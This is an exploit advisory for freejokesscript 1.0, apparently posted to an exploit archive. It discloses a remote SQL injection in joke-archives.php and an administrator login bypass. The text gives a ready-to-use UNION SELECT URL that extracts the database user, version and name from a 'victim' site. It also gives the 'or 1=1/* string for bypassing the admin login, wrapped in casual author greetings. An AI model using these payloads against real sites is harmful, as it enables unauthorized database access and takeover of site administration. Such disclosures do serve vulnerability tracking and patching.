# freejokesscript = 1.0 (joke-archives.php) remote sql injection vulnerability & admin bypass vulnerability # info : found at semi sexy mode, when i was searching jokes script for my own site. if u have any please help :(. i didnt sit and search them like others so dont kick me hard :) # author : MuhaciR aka гламурный подонок # source : http://www.evernewscripts.com/?p=3 # license price : $20 per copy # sql: http://www.victim.com/[jokes path if any]/joke-archives.php?cat_name=muhacir&cat_id=15+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/* # admin bypas: simply enter 'or 1=1/* at login. no filtration # greetz goes : -me -my love, ok a little to turkmen girlz too :) -friends: arassa_turkmen, bezzat, mc_merw, baamcik, dmry ;) -and ofcourse str0ke for running this site P.S:i wholeheartedly celebrate your valentines day and wish you to love, be loved, success and ferrari